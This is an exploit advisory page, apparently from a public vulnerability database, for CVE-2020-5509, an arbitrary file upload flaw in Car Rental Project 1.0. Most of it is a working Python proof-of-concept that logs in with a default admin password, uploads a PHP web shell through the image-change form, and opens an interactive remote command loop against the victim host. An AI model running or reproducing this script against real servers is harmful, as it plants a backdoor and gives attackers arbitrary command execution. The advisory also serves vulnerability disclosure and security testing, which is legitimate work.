Car Rental Project 1.0 Remote Code Execution

2020.01.14
Credit: FULLSHADE
Risk: High
Local: No
Remote: Yes
CWE: CWE-434


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Car Rental Project v.1.0 Remote Code Execution # Google Dork: N/A # Date: 1/3/2020 # Exploit Author: FULLSHADE # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/ # Version: 1.0 # Tested on: Windows # CVE : CVE-2020-5509 ================================================== Information & description ================================================== Car Rental Project v.1.0 is vulnerable to arbitrary file upload since an admin can change the image of a product and the file change PHP code doesn't validate or care what type of file is submitted, which leads to an attack having the ability to upload malicious files. This Python POC will execute arbitrary commands on the remote server. ================================================== Manual POC ================================================== Manual POC method - Visit carrental > admin login > changeimage1.php - Upload a php rce vulnerable payload - Visit /carrentalproject/carrental/admin/img/vehicleimages/.php to visit your file - Execute commands on the server ================================================== POC automation script ================================================== import sys import requests print( """ +-------------------------------------------------------------+ Car Rental Project v1.0 - Remote Code Execution FULLSHADE, FullPwn Operations +-------------------------------------------------------------+ """ ) def login(): sessionObj = requests.session() RHOSTS = sys.argv[1] bigstring = "\n+-------------------------------------------------------------+\n" print("+-------------------------------------------------------------+") print("[+] Victim host: {}".format(RHOSTS)) POST_AUTH_LOGIN = "http://" + RHOSTS + "/carrentalproject/carrental/admin/index.php" SHELL_UPLOAD_URL = ( "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php" ) # login / authentication payload = {"username": "admin", "password": "Test@12345", "login": ""} login = sessionObj.post(POST_AUTH_LOGIN, data=payload) # get response if login.status_code == 200: print("[+] Login HTTP response code: 200") print("[+] Successfully logged in") else: print("[!] Failed to authenticate") sys.exit() # get session token session_cookie_dic = sessionObj.cookies.get_dict() token = session_cookie_dic["PHPSESSID"] print("[+] Session cookie: {}".format(token)) # proxy for Burp testing proxies = {"http": " http://127.0.0.1:8080 ", "https": " http://127.0.0.1:8080 "} # data for uploading the backdoor request backdoor_file = { "img1": ( "1dccadfed7bcbb036c56a4afb97e906f.php", '<?php system($_GET["cmd"]); ?>', "Content-Type application/x-php", ) } backdoor_data = {"update": ""} SHELL_UPLOAD_URL = ( "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php" ) # actually upload the php shell try: r = sessionObj.post( url=SHELL_UPLOAD_URL, files=backdoor_file, data=backdoor_data ) print( "[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" + bigstring ) except: print("[!] Failed to upload backdoor") # get command execution while True: COMMAND = str(input('\033[32m' + "Command RCE >> " + '\033[m')) SHELL_LOCATION = ( "http://" + RHOSTS + "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" ) # get RCE results respond = sessionObj.get(SHELL_LOCATION + "?cmd=" + COMMAND) print(respond.text) if __name__ == "__main__": login()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top